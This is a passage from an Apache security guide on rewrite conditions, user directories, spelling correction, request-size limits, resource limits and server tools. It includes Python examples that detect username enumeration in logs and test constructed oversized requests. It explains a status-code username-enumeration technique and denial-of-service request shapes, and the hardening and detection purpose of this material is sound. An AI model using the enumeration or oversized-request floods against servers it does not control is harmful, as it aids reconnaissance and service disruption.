AUTH_TYPE                Stores the authentication method used 
DOCUMENT_ROOT            Stores DocumentRoot 
HTTP_ACCEPT              Stores the types the client will accept 
HTTP_COOKIE              Stores the cookie sent by the remote client 
HTTP_FORWARDED           Stores the Forwarded header, naming the proxy a request came through 
HTTP_HOST                Stores the Host header the client sent 
HTTP_PROXY_CONNECTION    Stores the HTTP Proxy-Connection header 
HTTP_REFERER             Stores the referring document's URL 
HTTP_USER_AGENT          Stores the client software identification 
IS_SUBREQ                Stores whether this is a subrequest 
PATH_INFO                Stores any extra path info sent 
QUERY_STRING             Stores the client's raw query string 
REMOTE_ADDR              Stores the client's IP address 
REMOTE_HOST              Stores the client's host name 
REMOTE_IDENT             Stores the remote username (if available) 
REMOTE_USER              Stores the username for authentication 
REQUEST_FILENAME         Stores the requested resource's local path 
REQUEST_METHOD           Stores the client's HTTP request method 
REQUEST_URI              Stores the HTTP requested URI 
SCRIPT_FILENAME          Stores the requested resource's local path (same as REQUEST_FILENAME) 
SERVER_ADDR              Stores the server's IP address 
SERVER_ADMIN             Stores the administrator's e-mail address 
SERVER_NAME              Stores the server's hostname 
SERVER_PORT              Stores the port on which httpd is running 
SERVER_PROTOCOL          Stores the server's protocol and version 
SERVER_SOFTWARE          Stores httpd's make and version 
THE_REQUEST              Stores the client's full HTTP request line 
TIME                     Stores the time in a formatted string 
TIME_DAY                 Stores the current day of the month (01-31) 
TIME_HOUR                Stores the current hour (00-23) 
TIME_MIN                 Stores the current minute (00-59) 
TIME_MON                 Stores the current month (01-12) 
TIME_SEC                 Stores the current second (00-59) 
TIME_WDAY                Stores the current weekday (0-6, Sunday being 0) 
TIME_YEAR                Stores the current year (four digits) 


Everything in the HTTP_* group, plus THE_REQUEST, REQUEST_URI, QUERY_STRING and 
PATH_INFO, comes straight from the client and can be anything the client likes, and 
REMOTE_HOST depends on DNS that the client's network controls. Write conditions on 
them accordingly. 





To lessen dangers that you might potentially face in formulating a custom regular 
expression on the previous variables (and other values), Apache included some 
preformatted tests, which Table 8.5 lists. Each takes the place of the regex in a 
RewriteCond and examines the expanded test string instead of pattern-matching it. 


TABLE 8.5 Prefabricated Tests for RewriteCond 

Test           What It Does 

'-d'           Is a directory 
'-f'           Is a regular file 
'-s'           Is a regular file greater than 0 bytes 
'-l'           Is a symbolic link 
'-F'           Is an existing file, checked via an internal subrequest 
'-U'           Is an existing URL, checked via an internal subrequest 
'!-d'          Is not a directory 
'!-f'          Is not a regular file 
'!-s'          Is not a regular file greater than 0 bytes 
'!-l'          Is not a symbolic link 
'!-F'          Is not an existing file, checked via subrequest 
'!-U'          Is not an existing URL, checked via subrequest 
'<String'      TestString is lexically less than String (plain string comparison, not a regex) 
'=String'      TestString is lexically equal to String 
'>String'      TestString is lexically greater than String 


The -F and -U tests are expensive: each one runs an internal subrequest, so a rule 
that every request reaches can double the work the server does. 





Additionally, RewriteCond supports two flags that enhance your ability to incisively and 
conditionally trigger Apache behavior. Table 8.6 describes them. 

TABLE 8.6 RewriteCond Flags 

Flag             What It Does 

'nocase|NC'      Match the condition without regard to case 
'ornext|OR'      Combine this condition with the next one by OR instead of the default AND 


RewriteRule 


RewriteRule is the most powerful of the mapping directives—especially matched with 
RewriteCond. RewriteRule will map any regular expression to a substitution, and you can 
qualify each rule with as many RewriteCond conditions as you want; the conditions 
immediately preceding a RewriteRule apply to that rule only. 


Table 8.7 lists a few regular expression constructs RewriteRule supports and what they do. 


TABLE 8.7 RewriteRule Regular Expressions 

Metacharacters   Function 

.                Match any one character 
[oak]            Match any character in brackets 
[^oak]           Match any character but those in brackets 

Quantifiers      Function 

?                Match the preceding element zero or one times 
*                Match the preceding element zero or more times 
+                Match the preceding element one or more times 
{num}            Match the preceding element num times 
{min,max}        Match the preceding element at least min times, but not more than max times 

Anchors          Function 

^                Match at the start of the line 
$                Match at the end of the line 
\<               Match at the beginning of a word 
\>               Match at the end of a word 
\b               Match at the beginning or the end of a word 
\B               Match any character not at the beginning or end of a word 

Others           Function 

|                A logical OR (to alternate) 
\                To escape characters, precede them with this 


Note that \< and \> are GNU extensions; the PCRE library that Apache 2.0 uses does not 
support them, so prefer \b. 





RewriteRule adds even more power than you can realize from regular expressions by 
accepting several important flags. Table 8.8 lists these and their functions. 


TABLE 8.8 RewriteRule Options and Flags 

Option or Flag        What It Does 

'chain|C'             Chains this rule with the next one: if this rule matches, the next 
                      rule is evaluated too; if it does not, the rest of the chain is 
                      skipped. 
'forbidden|F'         Forces a FORBIDDEN response (403) and stops processing. Combined 
                      with RewriteCond you can, for instance, test a client's address 
                      and deny it access to a specific document or URI. 
'gone|G'              Forces an HTTP_GONE response (410) and stops processing. 
'last|L'              Marks this rule as the last one: if it matches, no later rule is 
                      applied. 
'next|N'              The equivalent of continue in C or next in Perl: restarts the 
                      rule set from the first rule, using the rewritten URL as the new 
                      input. 
'nocase|NC'           Tells Apache not to treat the pattern as case sensitive. 
'proxy|P'             Turns the substitution into an internal proxy request and hands 
                      it to mod_proxy. 
'qsappend|QSA'        Appends the substitution's query string to the request's existing 
                      query string instead of replacing it. 
'redirect|R[=code]'   Forces an external redirection (precede the substitution with a 
                      fully qualified base URL, including protocol, hostname, and 
                      port); code defaults to 302. 


Be especially careful with [P]: if any part of the substitution comes from a capture in 
the request, the client chooses where your server connects, and you have built an open 
proxy. 
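To see how the conditions, the [OR] and [NC] condition flags and the [L] and [F] rule flags interact, here is a small Python emulation of the server-context evaluation loop. It is an added example, not mod_rewrite's code or this book's. The rule set it carries is constructed from the browser-specific index example above plus one rule that refuses TRACE and TRACK requests; the Rule class, its field names and the sample User-Agent strings are all assumptions of this example. It implements %{VAR} expansion, negated and case-insensitive conditions, OR groups, $N back-references and the F, G, L, NC and R flags; C, N, P, QSA, RewriteBase, maps and per-directory prefix stripping are left out. 

```python
import re


def parse_flags(text):
    """'L', 'NC,OR' or 'R=301' -> {'L': None} / {'NC': None, 'OR': None} / {'R': '301'}."""
    flags = {}
    for item in filter(None, (s.strip() for s in text.split(","))):
        name, _, value = item.partition("=")
        flags[name.upper()] = value or None
    return flags


class Rule:
    """One RewriteRule plus the RewriteConds that precede it (constructed for this example)."""

    def __init__(self, pattern, subst, flags="", conds=()):
        self.pattern = pattern
        self.subst = subst
        self.flags = parse_flags(flags)
        self.conds = [(t, p, parse_flags(f)) for t, p, f in conds]


def expand(test_string, env):
    """Replace %{VAR} with the request's value for VAR ('' when absent)."""
    return re.sub(r"%\{(\w+)\}", lambda m: env.get(m.group(1), ""), test_string)


def cond_holds(test_string, cond_pattern, flags, env):
    """One RewriteCond: a leading '!' negates, NC makes the regex case-insensitive."""
    negate = cond_pattern.startswith("!")
    pattern = cond_pattern[1:] if negate else cond_pattern
    found = re.search(pattern, expand(test_string, env), re.I if "NC" in flags else 0) is not None
    return found != negate


def conds_hold(conds, env):
    """Conditions are ANDed, except that an [OR] condition ORs with the ones
    that follow it up to and including the next condition without [OR]."""
    i = 0
    while i < len(conds):
        test, pattern, flags = conds[i]
        ok = cond_holds(test, pattern, flags, env)
        if "OR" in flags:
            if ok:                       # group satisfied: skip its remaining members
                while i < len(conds) and "OR" in conds[i][2]:
                    i += 1
                i += 1                   # ... including the group's terminating member
                continue
            i += 1                       # this alternative failed; try the next one
            continue
        if not ok:
            return False
        i += 1
    return True


def rewrite(rules, env, uri):
    """Return (status, uri) after running the rules in order, server context."""
    for rule in rules:
        m = re.search(rule.pattern, uri, re.I if "NC" in rule.flags else 0)
        if m is None or not conds_hold(rule.conds, env):
            continue
        if "F" in rule.flags:
            return 403, uri
        if "G" in rule.flags:
            return 410, uri
        if rule.subst != "-":            # "-" keeps the URI untouched
            uri = re.sub(r"\$(\d)", lambda g: m.group(int(g.group(1))) or "", rule.subst)
        if "R" in rule.flags:
            return int(rule.flags["R"] or 302), uri
        if "L" in rule.flags:
            break
    return 200, uri


RULES = [  # constructed rule set
    # Refuse cross-site-tracing helpers outright, before any other rule runs.
    Rule(".*", "-", "F", conds=[("%{REQUEST_METHOD}", "^(TRACE|TRACK)$", "NC")]),
    # MSIE first and unanchored: IE's User-Agent also begins with "Mozilla".
    Rule("^/$", "/index.activex.html", "L", conds=[("%{HTTP_USER_AGENT}", "MSIE", "")]),
    Rule("^/$", "/index.java.html", "L", conds=[("%{HTTP_USER_AGENT}", "^Mozilla", "")]),
    # Lynx, or no User-Agent at all, gets the bare-bones page.
    Rule("^/$", "/index.barebones.html", "L",
         conds=[("%{HTTP_USER_AGENT}", "^Lynx", "OR"), ("%{HTTP_USER_AGENT}", "^$", "")]),
]


def request(method, user_agent, uri="/"):
    """Build the environment RewriteCond sees for one constructed request and rewrite it."""
    return rewrite(RULES, {"REQUEST_METHOD": method, "HTTP_USER_AGENT": user_agent}, uri)
```

Call request("GET", "Mozilla/4.0 (compatible; MSIE 6.0)") and the MSIE rule wins even though the string also starts with Mozilla; swap the two rules and it no longer does, which is the ordering point made above. An empty User-Agent reaches the bare-bones page through the second member of the OR group, and a TRACE request never gets past the first rule. 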





mod_userdir 


mod_userdir handles mapping of user directories. It supports one directive only: 
UserDir. UserDir directly manages user directories. 


The syntax is 


UserDir directory-filename 


Here, directory-filename is 


• A directory name relative to each user's home directory (public_html, say), or an 
absolute path or URL pattern in which Apache substitutes the username for an asterisk 
• disabled—This kills all user directory mapping that you haven't explicitly 
declared elsewhere. 
• disabled [user-list]—The disabled keyword takes a space-delimited user list 
as an argument. Any users appearing here are locked out, meaning Apache 
won't map their directory, and hence their Web pages will not be visible from 
the outside. 
• enabled [user-list]—The enabled keyword takes a space-delimited user list 
as an argument, and users that appear here will enjoy directory translation 
even when a preceding UserDir disabled turned it off for everyone else. 


Apache treats other arguments (that aren't disabled or enabled) as filename 
patterns. The safest arrangement is an allow list: UserDir disabled, followed by 
UserDir enabled and the names of the accounts that actually publish pages. 


UserDir is a quick, painless way to map user directory data to the main 
DocumentRoot—or even virtual hosts. For example, suppose you make this assignment: 


UserDir public_html 


Now, suppose that you have a user named Alaric whose home directory is 
/home/Alaric, and whose Web directory is /home/Alaric/public_html. Alaric wants 
to house www.alaric-home.com on your server. Naturally, you don't want Alaric's 
HTML in the server's root directory, so you map his virtual host like this (substitute 
your own address for the documentation address 192.0.2.10): 


<VirtualHost 192.0.2.10> 
ServerAdmin Alaric@alaric-home.com 
DocumentRoot /home/Alaric/public_html 
ServerName www.alaric-home.com 
ErrorLog logs/alaric-home.com-error_log 
CustomLog logs/alaric-home.com-access_log common 
</VirtualHost> 


Apache would then serve an outside request for http://www.alaric-home.com/index.html 
from /home/Alaric/public_html/index.html, and the same files also answer at 
http://www.yourhost.com/~Alaric/ through the UserDir mapping. 


Note that public_html has long been a standard place for user HTML, and crackers 
are well aware of this. Consider designating some other directory and, better still, 
enabling the mapping only for the users who need it. If you don't, attackers could 
gather intelligence on your server. 


Such a case emerged in September 2001 on Red Hat Linux 7.0. Attackers could use 
Web clients to ascertain valid usernames by trying http://www.foo.com/~username. 
Apache would return a different status code depending on what it found: 200, 403, 
or 404. 


For example, if a user existed and had a homepage, Apache returned the home page. 
However, if a user existed but had no home page, Apache reported an access 
permission error (403). Finally, if no such user existed, Apache reported that it 
couldn't find the specified index (404). 

Through this mechanism, attackers could differentiate valid usernames from invalid 
ones. They didn't have to do it one at a time, either, or even three at a time. 
URL-grabbing tools like curl (available at http://curl.haxx.se/) could automate such 
discovery. 
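The 200/403/404 oracle leaves a recognisable trace in the access log: one client walking through many different /~username paths in a short time and collecting a mixture of status codes. The following Python script is an added example, not this book's or Apache's code. It parses Apache common/combined log lines and flags any client that requested at least min_users distinct /~user paths inside a sliding time window; the log lines, addresses, usernames and thresholds are all constructed for the example. 

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Common/combined log format: client, ident, user, [timestamp], "request", status, ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)
USERDIR_RE = re.compile(r"^/~(?P<user>[^/?]+)")  # the mod_userdir request shape

# Constructed log lines: one scanner walking a username list in ten seconds,
# and one ordinary visitor browsing a single user's pages over several minutes.
SAMPLE_LOG = """\
192.0.2.7 - - [14/Sep/2001:10:02:31 -0700] "GET /~root/ HTTP/1.0" 403 - "-" "curl/7.9"
192.0.2.7 - - [14/Sep/2001:10:02:32 -0700] "GET /~alice/ HTTP/1.0" 200 1834 "-" "curl/7.9"
192.0.2.7 - - [14/Sep/2001:10:02:33 -0700] "GET /~bob/ HTTP/1.0" 403 - "-" "curl/7.9"
192.0.2.7 - - [14/Sep/2001:10:02:35 -0700] "GET /~carol/ HTTP/1.0" 404 - "-" "curl/7.9"
192.0.2.7 - - [14/Sep/2001:10:02:36 -0700] "GET /~dave/ HTTP/1.0" 404 - "-" "curl/7.9"
192.0.2.7 - - [14/Sep/2001:10:02:38 -0700] "GET /~eve/ HTTP/1.0" 404 - "-" "curl/7.9"
192.0.2.7 - - [14/Sep/2001:10:02:41 -0700] "GET /~mail/ HTTP/1.0" 403 - "-" "curl/7.9"
198.51.100.4 - - [14/Sep/2001:10:03:02 -0700] "GET / HTTP/1.0" 200 512 "-" "Lynx/2.8.4rel.1"
198.51.100.4 - - [14/Sep/2001:10:03:10 -0700] "GET /~alice/ HTTP/1.0" 200 1834 "-" "Lynx/2.8.4rel.1"
198.51.100.4 - - [14/Sep/2001:10:06:45 -0700] "GET /~alice/pics/ HTTP/1.0" 200 2210 "-" "Lynx/2.8.4rel.1"
"""


def parse_userdir_probe(line):
    """Return (ip, timestamp, user, status) for a /~user request, else None."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    u = USERDIR_RE.match(m["path"])
    if u is None:
        return None
    when = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return m["ip"], when, u["user"], int(m["status"])


def find_enumeration(log_text, min_users=5, window=timedelta(seconds=60)):
    """Map client IP -> {'users': n, 'statuses': [...]} for every client that
    requested at least min_users distinct /~user paths within one window."""
    probes = defaultdict(list)
    for line in log_text.splitlines():
        rec = parse_userdir_probe(line)
        if rec is not None:
            probes[rec[0]].append(rec[1:])

    findings = {}
    for ip, events in probes.items():
        events.sort()                      # chronological; tuples sort on the timestamp first
        start = 0
        for end in range(len(events)):
            while events[end][0] - events[start][0] > window:
                start += 1                 # slide the window forward
            span = events[start:end + 1]
            users = {user for _, user, _ in span}
            if len(users) >= min_users:
                best = findings.get(ip, {"users": 0})
                if len(users) > best["users"]:
                    findings[ip] = {"users": len(users),
                                    "statuses": sorted({status for _, _, status in span})}
    return findings


if __name__ == "__main__":
    for ip, info in find_enumeration(SAMPLE_LOG).items():
        print(f"{ip}: {info['users']} distinct ~user probes, statuses {info['statuses']}")
```

On the sample, only 192.0.2.7 is reported (seven usernames in ten seconds, statuses 200, 403 and 404); the Lynx visitor, who only ever asks for ~alice, is not. Detection is the second line of defence: the first is to remove the oracle, by mapping only the users you enable and by answering a nonexistent user and a user without a public directory with the same status. 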


mod_speling 

It seems fitting that the developers named this module mod_speling instead of 
mod_spelling. Notwithstanding its ironic name, mod_speling does precisely what 
you'd expect: It auto-corrects URL spelling mistakes—to a degree. 


mod_speling ignores capitalization and corrects at most one mistake (one wrong, 
missing, extra or transposed character) in the final path component of a request. It 
works on a request-response basis: when the requested file does not exist, it reads the 
directory, compares each entry with the misspelled name and, if exactly one candidate 
fits, redirects the client to it (if several fit, it returns a list of them). 


NOTE 


You'll find mod_speling’s source in httpd-version/modules/mappers. 





mod_speling is a last-resort module in that it makes a last-ditch effort to derive a 
valid URL from the client's request. It runs only after the server has failed to find the 
file, examines the name and tries one correction (providing you enabled the spell-check 
function). 


mod_speling supports only one directive: CheckSpelling. 
The syntax is 


CheckSpelling state 


Here, state is either on or off. 


Note that the spelling test is for files or directories only and not for usernames. 
Moreover, carefully consider enabling this feature: every near-miss request forces httpd 
to read and compare an entire directory, so attackers can eat considerable CPU and 
memory by sending successive URIs for nonexistent names in large directories. The 
feature also answers "does a file with a similar name exist?" for anyone who asks, which 
is more than you usually want to tell a stranger. This feature is most useful in intranet 
environments (where you know the identities of your users and an attack is unlikely). 


Resource Usage 


Another issue you'll face is resource utilization, or controlling just how much 
bandwidth clients can eat and how many bytes they can send in any given request. These 
issues don't initially seem terribly important. However, if you neglect to address 
them, your host might come under sustained denial-of-service attacks. 

Directives that restrict or minimize such activity include 

• AcceptMutex 
• LimitRequestBody 
• LimitRequestFields 
• LimitRequestFieldsize 
• LimitRequestLine 
• RLimitCPU 
• RLimitMEM 
• RLimitNPROC 
• ThreadStackSize 


AcceptMutex 


AcceptMutex lets you specify how Apache will serialize its child processes' calls to 
accept() on the listening sockets. You can now set this at runtime and, except on IRIX 
(which has an additional method, uslock), you have four choices, each selecting what 
used to be a compile-time define: 


• flock (USE_FLOCK_SERIALIZED_ACCEPT)—The flock method uses flock(2) to lock the 
lock file you specify with LockFile. 

• fcntl (USE_FCNTL_SERIALIZED_ACCEPT)—The fcntl method uses fcntl(2) to lock the 
lock file you specify with LockFile. 

• sysvsem (USE_SYSVSEM_SERIALIZED_ACCEPT)—The sysvsem method uses SysV semaphores 
to implement the mutex. Apache's development team does not recommend this, because 
the semaphore's permissions let any process running as the server user (every CGI 
script, unless you use suexec) grab it, inviting DoS attacks, and a child that dies while 
holding it can leave it orphaned. 

• pthread (USE_PTHREAD_SERIALIZED_ACCEPT)—The pthread method uses POSIX mutexes 
but works flawlessly only under Solaris 2.5+. The Apache development team 
warns that in some configurations, this could hang Apache (unless your 
server serves exclusively static content). 


I favor the flock method. It's simple and unlikely to invite problems. It establishes 
the lock file (the traditional place for it being /var/lock/httpd.lock) and that's that. 




WARNING 


Do not attempt to establish a lock file (with LockFile) on any NFS or otherwise exported or 
imported volume. The lock file must be local. To understand why, consider this scenario: 
Suppose you established a lock file on a shared, exported, or imported volume. What happens 
if, in the middle of a transaction, that volume goes down (failed connectivity, protocol error, 
whatever)? Answer: The system will never release or even reach the lock file. 





LimitRequestBody 


The LimitRequestBody directive lets you limit the client's request body to a specific 
size. This functionality is only available in versions 1.3.2 and later. 


The syntax is 


LimitRequestBody value 


value is a numeric value that you specify, in bytes. It could be 0 (the default), which 
represents an unlimited request body size, all the way up to 2 gigabytes (2147483647), 
although few request bodies would approach 2 gigs. 


Certain denial-of-service attacks and other malicious actions often involve sending an 
enormous request body (in a POST or PUT, say) that the server must read before it can 
respond. LimitRequestBody offers you a mechanism to prevent such attacks: a request 
whose declared body exceeds the limit is rejected with a 413 (Request Entity Too Large) 
status. Set it per directory or location, sized to the largest legitimate upload you 
expect there. 


LimitRequestFields 


The LimitRequestFields directive, included in Apache's core system, enables you to 
limit the number of request header fields a client can send in its request. This 
functionality is only available in versions 1.3.2 and later. 


The syntax is 


LimitRequestFields value 


value is a numeric value that you specify. It could be 0, which represents an unlimited 
number of header fields, all the way up to 32767; the default is 100. Certain 
denial-of-service attacks (and other malicious actions) often require attackers to send 
overwhelming numbers of request headers in their requests. LimitRequestFields offers 
you a mechanism to prevent such attacks by controlling the number of request fields; 
a request that exceeds the limit is rejected with a 400 (Bad Request) status. 
LimitRequestFieldsize 


The LimitRequestFieldsize directive, included in Apache's core system, enables you 
to limit the size of any single request header field. This functionality is only 
available in versions 1.3.2 and later. 


The syntax is 


LimitRequestFieldsize value 


value is a number of bytes from 0 to the compiled-in default of 8190; unlike 
LimitRequestBody, 0 does not mean unlimited here. Certain denial-of-service attacks 
and other malicious actions require attackers to send impossibly long strings in 
individual header fields (a bloated Cookie or Referer header, say). 
LimitRequestFieldsize offers you a mechanism to prevent such attacks; an oversized 
field draws a 400 (Bad Request) status. 


LimitRequestLine 


The LimitRequestLine directive, included in Apache's core system, enables you to 
limit the client's request line (method, URI and protocol together) to a value less 
than the compiled-in default (8190). This functionality is only available in versions 
1.3.2 and later. 


The syntax is 

LimitRequestLine value 

value is a number of bytes from 0 to 8190, the compiled-in default; as with 
LimitRequestFieldsize, 0 is not a synonym for unlimited. Certain denial-of-service attacks 
and other malicious actions require attackers to send impossibly long strings in their 
request lines. LimitRequestLine offers you a mechanism to prevent such attacks; an 
over-long request line draws a 414 (Request-URI Too Large) status. 
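The four Limit* directives are all enforced while the request head is being read, before any handler runs. The following Python function is an added example, not Apache code: it applies the same four checks to a raw request and returns the status Apache sends for the corresponding rejection, so you can see which limit a given attack trips. The default and hardened limit sets and the constructed requests in the demonstration are assumptions of the example, and it measures the body it was actually handed rather than the Content-Length header Apache consults. 

```python
# Compiled-in defaults of the four directives, as described above (assumed here).
DEFAULT_LIMITS = {
    "LimitRequestLine": 8190,
    "LimitRequestFieldsize": 8190,
    "LimitRequestFields": 100,
    "LimitRequestBody": 0,          # 0 = unlimited, for this directive only
}

# A tighter set an operator might choose for a site with small forms and no uploads.
HARDENED_LIMITS = {
    "LimitRequestLine": 2048,
    "LimitRequestFieldsize": 4096,
    "LimitRequestFields": 40,
    "LimitRequestBody": 65536,
}


def check_request(raw, limits=DEFAULT_LIMITS):
    """Apply the Limit* checks to one raw HTTP/1.x request (bytes).

    Returns (status, reason): 414 when the request line is over LimitRequestLine,
    400 when a header field is over LimitRequestFieldsize or there are more fields
    than LimitRequestFields, 413 when the body is over LimitRequestBody, else (200, "ok").
    The checks run in the order the server would meet the offending bytes."""
    head, sep, body = raw.partition(b"\r\n\r\n")
    if not sep:
        return 400, "request head never terminated"
    request_line, *fields = head.split(b"\r\n")
    if len(request_line) > limits["LimitRequestLine"]:
        return 414, "request line exceeds LimitRequestLine"
    max_fields = limits["LimitRequestFields"]
    for index, field in enumerate(fields, start=1):
        if len(field) > limits["LimitRequestFieldsize"]:
            return 400, "header field exceeds LimitRequestFieldsize"
        if max_fields and index > max_fields:
            return 400, "number of header fields exceeds LimitRequestFields"
    max_body = limits["LimitRequestBody"]
    if max_body and len(body) > max_body:
        return 413, "request body exceeds LimitRequestBody"
    return 200, "ok"


def build_request(method="GET", path="/", headers=(), body=b""):
    """Assemble a minimal HTTP/1.0 request from constructed parts."""
    lines = [f"{method} {path} HTTP/1.0".encode()]
    lines += [f"{name}: {value}".encode() for name, value in headers]
    return b"\r\n".join(lines) + b"\r\n\r\n" + body


if __name__ == "__main__":
    probes = {  # constructed requests: one legitimate, four abusive
        "normal form post": build_request("POST", "/cgi-bin/form",
                                          [("Host", "www.example.com"), ("Content-Length", "11")],
                                          b"name=alaric"),
        "20 KB request line": build_request(path="/" + "A" * 20000),
        "16 KB cookie header": build_request(headers=[("Cookie", "x=" + "B" * 16000)]),
        "500 header fields": build_request(headers=[(f"X-Pad-{i}", "y") for i in range(500)]),
        "1 MB body": build_request("POST", "/cgi-bin/form", [("Content-Length", "1048576")],
                                   b"Z" * 1048576),
    }
    for name, raw in probes.items():
        print(f"{name:20s} default {check_request(raw)}  hardened {check_request(raw, HARDENED_LIMITS)}")
```

Against the defaults the over-long request line, the bloated cookie and the 500-field request are all refused, but the 1 MB body sails through because LimitRequestBody defaults to unlimited; the hardened set stops it with a 413. Pick the hardened numbers from what your application actually needs, since a limit smaller than a legitimate request simply turns that request away. 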


RLimitCPU 


RLimitCPU enables you to limit the CPU resources that processes forked from Apache 
child processes (CGI scripts and the like) can eat. 


The syntax is 
RLimitCPU number|max [number|max] 


The first value signifies the soft limit you're allowing; the optional second signifies 
the hard (absolute) limit, which only root may raise. max means the operating 
system's maximum. Express these values in seconds of CPU time per process. 


RLimitMEM 


RLimitMEM enables you to specify the memory resources that processes forked from 
Apache child processes can eat. 

The syntax is 
RLimitMEM number|max [number|max] 


The first value signifies the soft limit you're allowing; the optional second signifies 
the hard limit, and max means the operating system's maximum. Express these values 
in bytes per process. 


RLimitNPROC 
RLimitNPROC enables you to limit the number of processes a user (or UID) can have at 
once, as applied to processes that Apache child processes fork. 


The syntax is 


RLimitNPROC number|max [number|max] 


Here, the first value is the soft limit on the number of processes, the optional second 
value the hard limit, and max the operating system's maximum. Note that if your CGI 
scripts run under the same UID as the server (that is, you're not using suexec), the 
limit counts httpd's own children too, and setting it lower than the number of child 
processes you run will make forks fail (you'll see "cannot fork" messages in the error 
log). 


ThreadStackSize 


ThreadStackSize sets what stack size Apache should use for each running thread. 
Take care in what values you assign here, because a value too small will invite stack 
errors. 


The syntax is 


ThreadStackSize number 


Here, number represents the size. The default is 65536. 


Apache Server Tools 


Apache ships with several server tools that help you more efficiently manage Apache 
and its functions. They are 


• ab 
• apachectl 
• apxs 
• suexec 


ab (The Apache HTTP Server Benchmarking Tool) 


ab, the HTTP server benchmarking tool, will track your Apache server's performance 
by ascertaining how many requests per second your Apache installation can sustain. 
A simple test: 


$ ab -n 100 http://www.hiddenhost-sams.com:80/ 

Server Software:        Apache/1.3.12 
Server Hostname:        www.hiddenhost-sams.com 
Server Port:            80 

Document Path:          / 
Document Length:        68 bytes 

Concurrency Level:      1 
Time taken for tests:   0.121 seconds 
Complete requests:      100 
Failed requests:        0 
Total transferred:      34200 bytes 
HTML transferred:       6800 bytes 
Requests per second:    826.45 
Transfer rate:          282.64 kb/s received 

Connection Times (ms) 
              min   avg   max 
Connect:        0     0     0 
Processing:     0     0    12 
Total:          0     0    12 


As noted, ab performed a small test of 100 successive requests over 0.121 seconds. 
Based on this sparse information, it found that my system could handle 826.45 
requests per second. That's not accurate, though: It would likely fold before it 
reached that amount, especially if the requests were concurrent. Let's try it: 


$ ab -c 100 -n 1000 http://www.hiddenhost-sams.com:80/ 

Server Software:        Apache/1.3.12 
Server Hostname:        www.hiddenhost-sams.com 
Server Port:            80 

Document Path:          / 
Document Length:        68 bytes 

Concurrency Level:      100 
Time taken for tests:   3.155 seconds 
Complete requests:      1000 
Failed requests:        0 
Total transferred:      342000 bytes 
HTML transferred:       68000 bytes 
Requests per second:    316.96 
Transfer rate:          108.40 kb/s received 

Connection Times (ms) 
              min   avg   max 
Connect:        0     1    12 
Processing:    19   284   928 
Total:         19   285   940 

Things now look a tad different. In the previous test, I asked for 1000 connections 
with a concurrency setting of 100. Suddenly, performance went way down (from 
826.45 per second to 316.96 per second). You can try different scenarios: tweaking 
and alternating number of requests, concurrency, authentication, time limits, and so 
forth. Mix and match these to simulate real-life conditions (the result might surprise 
you). Table 8.9 describes ab options. 


TABLE 8.9 ab Options and Arguments 

Option or Argument          Significance 

-A username:password        Pass basic authentication credentials during ab's test. 
-c concurrency              The number of concurrent requests ab should perform. By default, 
                            ab doesn't do concurrent connections but instead, successive ones. 
-C name=value               Append a cookie line to each request during the test, with 
                            name/value pairs for variables. 
-h                          Display quick help. 
-i                          Use a HEAD instead of a GET method. Note: you cannot mix this 
                            with a POST HTTP request. 
-k                          Enable the capability to perform multiple requests within one HTTP 
                            session (keep-alive). Default is not to enable this feature. 
-n num                      Here, num represents the number of requests ab should perform. 
-H header                   Append custom headers to each request during the test. 
-p post-file                A file that contains POST data for ab to send during tests. 
-P username:password        Pass proxy credentials during the test. 
-T content-type             The content-type header ab should use for POST data. 
-t time-limit               The number of seconds to perform the specified test. (Default is 
                            none, which means that ab will continue until the job is done.) 
-v 1|2|3|4                  Sets the verbosity level. Level 4 prints header information, level 3 
                            prints response codes, level 2 prints warnings and informational 
                            messages. Level 1 is nominal. 
-V                          Display version information. 
-w                          Format output in tabled HTML. 
-x attributes               A string to use as attributes for <table>. 
-y attributes               A string to use as attributes for <tr>. 
-z attributes               A string to use as attributes for <td>. 


Bear in mind that ab generates exactly the kind of load a flooding attacker does. Run it 
only against servers you own or have permission to test, and warn the people who 
depend on a production server before you point it there. 
apachectl 


apachectl is the Apache HTTP server control interface. apachectl is essentially a 
quick-access front end to httpd. Using apachectl you can start, stop, or obtain 
httpd's status. Table 8.10 lists apachectl's options. 


TABLE 8.10 apachectl Options 

Option or Argument    Significance 

configtest            This will test your configuration file (httpd.conf) syntax for errors. 
                      Run it before every restart; a restart with a broken configuration 
                      leaves you with no server at all. 
fullstatus            Displays a verbose status report pulled from mod_status, a requisite 
                      for this to work. 
graceful              Gracefully restarts httpd via a SIGUSR1; children finish their current 
                      requests before exiting. 
help                  Displays help. 
restart               Restarts httpd by sending a SIGHUP. If httpd isn't running, this 
                      starts it. 
start                 Starts httpd. 
status                Displays a brief status report. 
stop                  Stops httpd. 

apxs

apxs, the Apache Extension Tool, is a tool for building and installing extension
modules for httpd as a Dynamic Shared Object (DSO) from object files, which you
can subsequently load via LoadModule.

apxs is a Perl script, located (usually) in /usr/sbin. A brief tour of it reveals that it
goes through eight phases:

• Configuration—Sets all variables to be used
• Argument handling—Parses the argument line
• Initial DSO support check
• Query Information—Gets the Makefile flags
• DSO Compilation—Splits files into source and object files
• Output File Choice—Determines and sets the outfile
• Compiling and linking
• DSO Installation

In all, apxs is very useful, but to use it, you must have mod_so support. To find out,
issue the httpd command plus the -l option, which lists the compiled-in
modules.

For example:

[root@samshacker]# /usr/sbin/httpd -l
Compiled-in modules:
  http_core.c
  mod_so.c

Table 8.11 lists apxs's options and arguments.


TABLE 8.11 apxs Options and Arguments

Option or Argument       Significance

-n [name]                Use this to specify the module's name.
-q [flags]               Use this to query apxs about what it knows. Here, apxs reports the
                         flags it has knowledge of right now. Valid flags can be CC, CFLAGS,
                         FLAGS_SHLIB, INCLUDEDIR, LD_SHLIB, LDFLAGS_SHLIB, LIBEXECDIR,
                         LIBS_SHLIB, PREFIX, SBINDIR, SYSCONFDIR, and TARGET.
-S [variable]            Use this to set flags. Valid flags are CC, CFLAGS, FLAGS_SHLIB,
                         INCLUDEDIR, LD_SHLIB, LDFLAGS_SHLIB, LIBEXECDIR, LIBS_SHLIB,
                         PREFIX, SBINDIR, SYSCONFDIR, and TARGET.
-g [directory]           This option generates sample template files and a makefile in a
                         named subdirectory.
-c                       This is the DSO compilation option. It compiles the C source files into
                         object files and builds a DSO in dsofile by linking the object files. If
